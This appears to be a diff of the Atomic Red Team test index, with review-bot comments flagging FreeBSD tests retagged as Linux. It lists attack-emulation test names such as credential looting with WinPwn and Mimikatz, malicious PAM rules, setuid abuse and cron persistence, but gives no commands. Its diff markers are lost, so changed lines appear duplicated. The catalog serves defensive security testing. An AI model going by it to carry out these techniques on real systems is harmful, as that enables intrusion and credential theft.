- Atomic Test #6: Delete a single file - Windows PowerShell [windows]
- Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
- Atomic Test #8: Delete Filesystem - Linux [linux]
- Atomic Test #9: Delete Filesystem - FreeBSD [freebsd]
- Atomic Test #9: Delete Filesystem - FreeBSD [linux]
- Atomic Test #10: Delete Prefetch File [windows]
- Atomic Test #11: Delete TeamViewer Log Files [windows]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
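Review bot: `Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS` and `#2: Delete an entire folder - FreeBSD/Linux/macOS` keep FreeBSD in their names while their tags shrink from `[freebsd, linux, macos]` to `[linux, macos]`, and `#9: Delete Filesystem - FreeBSD` is retagged `[linux]` directly under `#8: Delete Filesystem - Linux [linux]`. Either the names or the tags are now wrong; given the rest of this diff it is the tags, so the `freebsd` platform should be restored on #1, #2 and #9.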
@@ -724,7 +724,7 @@
- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #1: Space After Filename (Manual) [macos]
- Atomic Test #2: Space After Filename [macos, linux]
- Atomic Test #3: Space After Filename (FreeBSD) [freebsd]
- Atomic Test #3: Space After Filename (FreeBSD) [linux]
- [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
@@ -743,7 +743,7 @@
- Atomic Test #3: WMIC bypass using local XSL file [windows]
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [freebsd, linux, macos]
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
@@ -787,11 +787,11 @@
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Create local account (FreeBSD) [freebsd]
- Atomic Test #9: Create local account (FreeBSD) [linux]
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- Atomic Test #12: Login as nobody (Linux) [linux]
- Atomic Test #13: Login as nobody (freebsd) [freebsd]
- Atomic Test #13: Login as nobody (freebsd) [linux]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
- Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
@@ -855,11 +855,11 @@
- Atomic Test #24: Disable UAC - Switch to the secure desktop when prompting for elevation via registry key [windows]
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Sudo usage (freebsd) [freebsd]
- Atomic Test #2: Sudo usage (freebsd) [linux]
- Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [freebsd]
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
- Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [freebsd]
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
@@ -881,9 +881,9 @@
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- Atomic Test #5: Remote Service Installation CMD [windows]
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [freebsd]
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.012 Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md)
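Review bot: `Atomic Test #3: Cron - Add script to /etc/cron.d folder` changes from `[freebsd]` to `[linux]` here, and the same two-line change recurs for the second copy of T1053.003 at hunk @@ -1201. Nothing in the test name marks it as the FreeBSD variant, so after this merge the index gives no hint that #3 differs from the Linux cron tests around it (#2, #4); the platform tag was the only signal and it should be kept. The `[freebsd, macos, linux]` to `[linux, macos]` change on #1 also drops FreeBSD from a test that supported it.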
@@ -938,9 +938,9 @@
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap EXIT (freebsd) [freebsd]
- Atomic Test #2: Trap EXIT (freebsd) [linux]
- Atomic Test #3: Trap SIGINT [macos, linux]
- Atomic Test #4: Trap SIGINT (freebsd) [freebsd]
- Atomic Test #4: Trap SIGINT (freebsd) [linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
@@ -954,15 +954,15 @@
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Make and modify binary from C source (freebsd) [freebsd]
- Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
- Atomic Test #3: Set a SetUID flag on file [macos, linux]
- Atomic Test #4: Set a SetUID flag on file (freebsd) [freebsd]
- Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
- Atomic Test #5: Set a SetGID flag on file [macos, linux]
- Atomic Test #6: Set a SetGID flag on file (freebsd) [freebsd]
- Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
- Atomic Test #7: Make and modify capabilities of a binary [linux]
- Atomic Test #8: Provide the SetUID capability to a file [linux]
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux]
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
@@ -1059,9 +1059,9 @@
- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- Atomic Test #3: Add command to .shrc [freebsd]
- Atomic Test #4: Append to the system shell profile [freebsd, linux]
- Atomic Test #5: Append commands user shell profile [freebsd, linux]
- Atomic Test #3: Add command to .shrc [linux]
- Atomic Test #4: Append to the system shell profile [linux]
- Atomic Test #5: Append commands user shell profile [linux]
- Atomic Test #6: System shell profile scripts [linux]
- Atomic Test #7: Create/Append to .bash_logout [linux]
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
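Review bot: `Atomic Test #3: Add command to .shrc` is retagged from `[freebsd]` to `[linux]` even though the technique heading in this very hunk (`.bash_profile .bashrc and .shrc`) lists .shrc as the FreeBSD-side file alongside the two bash files, and #4/#5 lose freebsd from `[freebsd, linux]`. Keep `[freebsd]` on #3 and `[freebsd, linux]` on #4 and #5.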
@@ -1098,11 +1098,11 @@
- Atomic Test #1: rc.common [macos]
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- Atomic Test #4: rc.local (FreeBSD) [freebsd]
- Atomic Test #4: rc.local (FreeBSD) [linux]
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create SysV Service [freebsd]
- Atomic Test #2: Create SysV Service [linux]
- Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
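Review bot: `Atomic Test #4: rc.local (FreeBSD)` and `Atomic Test #2: Create SysV Service` both change from `[freebsd]` to `[linux]`. The rc.local case is a plain name/tag contradiction sitting right under `#3: rc.local [linux]`; the SysV case is subtler because Linux also has SysV-style init scripts, so once tagged linux nothing in the index records that the test was written for FreeBSD (the removed line is the only evidence). Restore `[freebsd]` on both.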
@@ -1128,7 +1128,7 @@
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: At - Schedule a job [linux]
- Atomic Test #3: At - Schedule a job freebsd [freebsd]
- Atomic Test #3: At - Schedule a job freebsd [linux]
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
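Review bot: `Atomic Test #3: At - Schedule a job freebsd` is tagged `[linux]` after this change, directly under `#2: At - Schedule a job [linux]`, so the index lists two Linux at(1) tests, one of which is FreeBSD's by its own name. Keep `[freebsd]` on #3.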
@@ -1144,11 +1144,11 @@
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Create local account (FreeBSD) [freebsd]
- Atomic Test #9: Create local account (FreeBSD) [linux]
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- Atomic Test #12: Login as nobody (Linux) [linux]
- Atomic Test #13: Login as nobody (freebsd) [freebsd]
- Atomic Test #13: Login as nobody (freebsd) [linux]
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1201,9 +1201,9 @@
|
||||
- Atomic Test #10: LNK Payload Download [windows]
|
||||
- Atomic Test #11: Mirror Blast Emulation [windows]
|
||||
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
|
||||
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
|
||||
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [freebsd]
|
||||
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
|
||||
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
|
||||
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
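Review bot: besides the `[freebsd]`/`[linux]` flip on `Atomic Test #3: Cron - Add script to /etc/cron.d folder`, the two sides also order the platform list differently for Test #1 (`[freebsd, macos, linux]` versus `[linux, macos]`), which indicates the two sides were produced by different generator versions. Regenerating every index file from one generator run avoids this noise and keeps the duplicate cron block later in this patch in step with this one.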
@@ -1271,22 +1271,22 @@
|
||||
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
|
||||
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
|
||||
- Atomic Test #1: Create and Execute Bash Shell Script [freebsd, linux, macos]
|
||||
- Atomic Test #2: Command-Line Interface [freebsd, linux, macos]
|
||||
- Atomic Test #1: Create and Execute Bash Shell Script [linux, macos]
|
||||
- Atomic Test #2: Command-Line Interface [linux, macos]
|
||||
- Atomic Test #3: Harvest SUID executable files [linux]
|
||||
- Atomic Test #4: LinEnum tool execution [linux]
|
||||
- Atomic Test #5: New script file in the tmp directory [freebsd, linux]
|
||||
- Atomic Test #6: What shell is running [freebsd, linux]
|
||||
- Atomic Test #7: What shells are available [freebsd, linux]
|
||||
- Atomic Test #8: Command line scripts [freebsd, linux]
|
||||
- Atomic Test #5: New script file in the tmp directory [linux]
|
||||
- Atomic Test #6: What shell is running [linux]
|
||||
- Atomic Test #7: What shells are available [linux]
|
||||
- Atomic Test #8: Command line scripts [linux]
|
||||
- Atomic Test #9: Obfuscated command line scripts [linux]
|
||||
- Atomic Test #10: Obfuscated command line scripts (freebsd) [freebsd]
|
||||
- Atomic Test #10: Obfuscated command line scripts (freebsd) [linux]
|
||||
- Atomic Test #11: Change login shell [linux]
|
||||
- Atomic Test #12: Change login shell (freebsd) [freebsd]
|
||||
- Atomic Test #12: Change login shell (freebsd) [linux]
|
||||
- Atomic Test #13: Environment variable scripts [linux]
|
||||
- Atomic Test #14: Environment variable scripts (freebsd) [freebsd]
|
||||
- Atomic Test #14: Environment variable scripts (freebsd) [linux]
|
||||
- Atomic Test #15: Detecting pipe-to-shell [linux]
|
||||
- Atomic Test #16: Detecting pipe-to-shell (freebsd) [freebsd]
|
||||
- Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux]
|
||||
- Atomic Test #17: Current kernel information enumeration [linux]
|
||||
- [T1559 Inter-Process Communication](../../T1559/T1559.md)
|
||||
- Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
|
||||
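Review bot: once the `(freebsd)` variants of tests #10, #12, #14 and #16 carry `[linux]`, they become indistinguishable by platform from the Linux tests #9, #11, #13 and #15 they mirror, so a platform filter on a Linux host would select both the FreeBSD variant and the Linux variant of `Obfuscated command line scripts`, `Change login shell`, `Environment variable scripts` and `Detecting pipe-to-shell`. Either the freebsd tag must survive the merge or each pair should be collapsed into one test that lists both platforms.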
@@ -1301,10 +1301,10 @@
|
||||
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
|
||||
- Atomic Test #1: Execute shell script via python's command mode arguement [freebsd, linux]
|
||||
- Atomic Test #2: Execute Python via scripts [freebsd, linux]
|
||||
- Atomic Test #3: Execute Python via Python executables [freebsd, linux]
|
||||
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [freebsd, linux]
|
||||
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
|
||||
- Atomic Test #2: Execute Python via scripts [linux]
|
||||
- Atomic Test #3: Execute Python via Python executables [linux]
|
||||
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
|
||||
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1059.003 Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md)
|
||||
- Atomic Test #1: Create and Execute Batch Script [windows]
|
||||
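Review bot: `arguement` in `Atomic Test #1: Execute shell script via python's command mode arguement` is misspelled on both sides of the hunk; since the index is generated, fix the `name` field in the T1059.006 atomic YAML so the correction carries into every regenerated listing. The tag change on tests #1 to #4 is the freebsd regression raised above.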
@@ -1333,7 +1333,7 @@
|
||||
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
|
||||
- Atomic Test #1: At.exe Scheduled task [windows]
|
||||
- Atomic Test #2: At - Schedule a job [linux]
|
||||
- Atomic Test #3: At - Schedule a job freebsd [freebsd]
|
||||
- Atomic Test #3: At - Schedule a job freebsd [linux]
|
||||
- T1035 Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1086 PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1357,7 +1357,7 @@
|
||||
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
|
||||
- Atomic Test #1: Malicious PAM rule [linux]
|
||||
- Atomic Test #2: Malicious PAM rule (freebsd) [freebsd]
|
||||
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
|
||||
- Atomic Test #3: Malicious PAM module [linux]
|
||||
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
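Review bot: `Atomic Test #2: Malicious PAM rule (freebsd)` appearing under `[linux]` is the same freebsd tag regression, but for T1556.003 it matters more than for a discovery test: a PAM configuration change executed on the wrong platform can break authentication for every user on the host, so the platform tag, not just the test name, must gate where this test is run. Verify this entry explicitly after the index is regenerated.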
@@ -1394,9 +1394,9 @@
|
||||
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
|
||||
- Atomic Test #5: Remote Service Installation CMD [windows]
|
||||
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
|
||||
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
|
||||
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [freebsd]
|
||||
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
|
||||
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
|
||||
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1137 Office Application Startup](../../T1137/T1137.md)
|
||||
@@ -1425,9 +1425,9 @@
|
||||
- Atomic Test #1: Simulate Patching termsrv.dll [windows]
|
||||
- Atomic Test #2: Modify Terminal Services DLL Path [windows]
|
||||
- [T1176 Browser Extensions](../../T1176/T1176.md)
|
||||
- Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos]
|
||||
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos]
|
||||
- Atomic Test #3: Firefox [freebsd, linux, windows, macos]
|
||||
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
|
||||
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
|
||||
- Atomic Test #3: Firefox [linux, windows, macos]
|
||||
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
|
||||
- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
|
||||
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1473,21 +1473,21 @@
|
||||
- T1031 Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
|
||||
- Atomic Test #1: Trap EXIT [macos, linux]
|
||||
- Atomic Test #2: Trap EXIT (freebsd) [freebsd]
|
||||
- Atomic Test #2: Trap EXIT (freebsd) [linux]
|
||||
- Atomic Test #3: Trap SIGINT [macos, linux]
|
||||
- Atomic Test #4: Trap SIGINT (freebsd) [freebsd]
|
||||
- Atomic Test #4: Trap SIGINT (freebsd) [linux]
|
||||
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
|
||||
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
|
||||
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
|
||||
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
|
||||
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
|
||||
- Atomic Test #1: Create a user account on a Linux system [linux]
|
||||
- Atomic Test #2: Create a user account on a FreeBSD system [freebsd]
|
||||
- Atomic Test #2: Create a user account on a FreeBSD system [linux]
|
||||
- Atomic Test #3: Create a user account on a MacOS system [macos]
|
||||
- Atomic Test #4: Create a new user in a command prompt [windows]
|
||||
- Atomic Test #5: Create a new user in PowerShell [windows]
|
||||
- Atomic Test #6: Create a new user in Linux with `root` UID and GID. [linux]
|
||||
- Atomic Test #7: Create a new user in FreeBSD with `root` GID. [freebsd]
|
||||
- Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux]
|
||||
- Atomic Test #8: Create a new Windows admin user [windows]
|
||||
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
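Review bot: `Atomic Test #2: Create a user account on a FreeBSD system` and `Atomic Test #7: Create a new user in FreeBSD with `root` GID.` are tagged `[linux]` on one side. Account-creation tests should not be gated by a tag that names the wrong OS, because a test that starts and fails partway leaves a created account behind, and a root-GID account at that; resolve the tag before merging. The `Trap EXIT (freebsd)` and `Trap SIGINT (freebsd)` entries in the same hunk follow the pattern noted above.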
@@ -1503,7 +1503,7 @@
|
||||
- T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
|
||||
- Atomic Test #1: Modify SSH Authorized Keys [freebsd, macos, linux]
|
||||
- Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
|
||||
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1101 Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
|
||||
@@ -1623,9 +1623,9 @@
|
||||
- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
|
||||
- Atomic Test #1: Add command to .bash_profile [macos, linux]
|
||||
- Atomic Test #2: Add command to .bashrc [macos, linux]
|
||||
- Atomic Test #3: Add command to .shrc [freebsd]
|
||||
- Atomic Test #4: Append to the system shell profile [freebsd, linux]
|
||||
- Atomic Test #5: Append commands user shell profile [freebsd, linux]
|
||||
- Atomic Test #3: Add command to .shrc [linux]
|
||||
- Atomic Test #4: Append to the system shell profile [linux]
|
||||
- Atomic Test #5: Append commands user shell profile [linux]
|
||||
- Atomic Test #6: System shell profile scripts [linux]
|
||||
- Atomic Test #7: Create/Append to .bash_logout [linux]
|
||||
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
|
||||
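Review bot: `Atomic Test #5: Append commands user shell profile` is missing a word on both sides (`Append commands to user shell profile`); fix it in the YAML name. Test #3 (`Add command to .shrc`) is the FreeBSD-side entry of this technique, as the technique title `.bash_profile .bashrc and .shrc` shows, so tagging it `[linux]` is the same regression and would have a Linux run edit a profile file that bash does not read.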
@@ -1670,12 +1670,12 @@
|
||||
- Atomic Test #1: rc.common [macos]
|
||||
- Atomic Test #2: rc.common [linux]
|
||||
- Atomic Test #3: rc.local [linux]
|
||||
- Atomic Test #4: rc.local (FreeBSD) [freebsd]
|
||||
- Atomic Test #4: rc.local (FreeBSD) [linux]
|
||||
- T1209 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1159 Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
|
||||
- Atomic Test #1: Create Systemd Service [linux]
|
||||
- Atomic Test #2: Create SysV Service [freebsd]
|
||||
- Atomic Test #2: Create SysV Service [linux]
|
||||
- Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
|
||||
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
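Review bot: `Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service.` has a stray space before the second comma and a trailing period that the other names lack; fix it in the YAML name. `Atomic Test #2: Create SysV Service` and `Atomic Test #4: rc.local (FreeBSD)` are the FreeBSD entries here and carry `[linux]` on one side, which is the regression noted above.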
@@ -1703,7 +1703,7 @@
|
||||
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
|
||||
- Atomic Test #1: At.exe Scheduled task [windows]
|
||||
- Atomic Test #2: At - Schedule a job [linux]
|
||||
- Atomic Test #3: At - Schedule a job freebsd [freebsd]
|
||||
- Atomic Test #3: At - Schedule a job freebsd [linux]
|
||||
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
|
||||
- Atomic Test #1: Netsh Helper DLL Registration [windows]
|
||||
@@ -1719,11 +1719,11 @@
|
||||
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
|
||||
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
|
||||
- Atomic Test #8: Create local account (Linux) [linux]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [freebsd]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [linux]
|
||||
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
|
||||
- Atomic Test #12: Login as nobody (Linux) [linux]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [freebsd]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [linux]
|
||||
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
|
||||
- Atomic Test #1: User scope COR_PROFILER [windows]
|
||||
- Atomic Test #2: System Scope COR_PROFILER [windows]
|
||||
@@ -1733,7 +1733,7 @@
|
||||
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
|
||||
- Atomic Test #1: Base64 Encoded data. [macos, linux]
|
||||
- Atomic Test #2: Base64 Encoded data (freebsd) [freebsd]
|
||||
- Atomic Test #2: Base64 Encoded data (freebsd) [linux]
|
||||
- Atomic Test #3: XOR Encoded data. [windows]
|
||||
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md)
|
||||
@@ -1785,11 +1785,11 @@
|
||||
- Atomic Test #2: Tor Proxy Usage - Windows [windows]
|
||||
- Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
|
||||
- Atomic Test #4: Tor Proxy Usage - MacOS [macos]
|
||||
- Atomic Test #5: Tor Proxy Usage - FreeBSD [freebsd]
|
||||
- Atomic Test #5: Tor Proxy Usage - FreeBSD [linux]
|
||||
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1571 Non-Standard Port](../../T1571/T1571.md)
|
||||
